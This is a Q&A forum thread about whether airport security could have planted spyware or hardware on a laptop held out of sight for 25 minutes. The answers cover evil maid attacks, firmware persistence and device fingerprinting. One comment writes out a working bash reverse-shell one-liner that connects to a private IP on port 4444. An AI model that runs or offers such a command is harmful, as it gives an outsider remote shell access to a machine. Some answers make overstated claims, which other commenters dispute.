0

During my commute from an airport located in a country whose government is known for intrusions into the privacy of its citizens and non-citizens, I had my laptop taken from me during a routine security procedure. I usually get to see my electronic devices being swabbed and X-Rayed as all of the equipment needed for the security checks is located in the same room. However, this time, my laptop was taken to another location where I did not get to see which checks were being performed on it. I had to wait around 25 minutes for it to return to me. Is it possible that during that time, spyware or spy-hardware was installed on my laptop?

schroeder
  • 125,553
  • 55
  • 289
  • 326
Razgriz
  • 1
  • 1
  • 1
    Here are a couple questions you may find interesting: [Is momentary physical access dangerous?](/q/187515/129883) and [What are the potential risks of leaving a device in public, but locked?](/q/223486/129883) – Fire Quacker Feb 13 '20 at 17:45
  • What power state was the laptop in when you gave it up? If it was in sleep mode before, was it still in the same place afterwards? – multithr3at3d Feb 14 '20 at 00:50
  • It takes about as long as i takes to write: `bash -i >& /dev/tcp/192.168.1.x/4444 0>&1` – limeeattack Feb 14 '20 at 12:43

3 Answers3

4

Checking the screws and other physical marks of being opened might indicate if hardware was installed.

If you had a strong enough password, they likely were not able to "install something" in 25 minutes.

"Evil Maid" attacks have been mentioned, but, while possible, are not so probable given modern firmware. It depends on your laptop (and how old it is). That can happen in a few minutes.

Your peripherals are another matter, though, and if they had those (including the power supply), I might be more worried about those.

And yet, they would not have had to install anything or monkey around with your equipment at all to now be able to spy on you.

With your laptop, no extra equipment, and 25 minutes to leisurely do their thing, they can get your laptop's:

  • make, model, serial number
  • operating system
  • wifi MAC address
  • "auto-connect" wifi networks you use
  • [possible - there are a bunch of dependencies to be able to do this] services/websites you use and browser fingerprint (if you only locked the machine instead of power it down and the browser was active in the background)

and connect all those things with whatever is on your national identity papers. Now, they can spy on you just by tracking your laptop, wifi, and internet activity over the core country network and/or wifi trackers.

No installs needed.

schroeder
  • 125,553
  • 55
  • 289
  • 326
  • 1
    I agree with all of the above. In addition, it doesn't seem too far-fetched that they could have pulled-off an Evil Maid Attack in 25 minutes. https://www.schneier.com/blog/archives/2009/10/evil_maid_attac.html – mti2935 Feb 14 '20 at 00:44
  • The question does not state whether there is full-disk encryption, or whether the laptop was originally powered on. If there was no encryption, they could have installed to or read anything they wanted on the hard disk, no passwords needed. Could have booted off a USB drive in this case. – multithr3at3d Feb 14 '20 at 00:51
  • @multithr3at3d I completely agree, but I question being able to get anything of value in 25 minutes. It seems too short a time for practical extraction. If extraction was their goal, I'd imagine a much longer time taken. – schroeder Feb 14 '20 at 08:19
0

This brought to mind some articles about the so called "Evil Maid attack", which installs a firmware backdoor on a laptop in less than 4 minutes: https://wccftech.com/evil-maid-attack-firmware-backdoor/ https://hothardware.com/news/evil-maid-attack-takes-pc-cleaners-sub-4-minute-backdoor-firmware-install

-1

Well, yes.

It's totally possible that the malware if it's sophisticated enough is installed in the bios, the firmware for peripherals, data files on removable storage devices or on your backups.

Reinstalling operating system under previous statements, you'll only wipe the disk data and even there, you might need to take care of the backup you create before the OS reinstall, that data may have been compromised also.

Malware can be stored inside memory of almost if I'm not wrong any component of a modern computer.

I don't guarantee that your device is safe enough anymore, you can buy a new one to stay safe if you wish, I wouldn't trust my device after this kind of intrusion.

IceeFrog
  • 125
  • 7
  • 1
    I don't entirely agree. Was the computer locked with a strong password? Then installing spyware *may* be out (although not necessarily). Is it possible to install spy-hardware in that time? Sure, especially with preparation. However, that doesn't meant that OP needs to throw out their current computer. If you are someone that is of interest to the government in question (potential foreign supporter of dissident, employee of value in tech organization) then I would be more concerned. If I were a "random Joe" I might reinstall, but that's all I would worry about – Conor Mancone Feb 13 '20 at 19:56
  • 1
    It's certainly **not** true that malware can be installed inside the memory of almost any component. In particular, installing malicious firmware takes time and preparation, because it is specific to the hardware of a particular computer. Again, unless you are a person of interest, I doubt anything that crazy happened – Conor Mancone Feb 13 '20 at 19:57
  • Well considering this was a government compromising a random guy computer, it would not surprise me that they installed a malware on his computer. Consider reading [this](https://security.stackexchange.com/a/7213/220798) – IceeFrog Feb 13 '20 at 21:26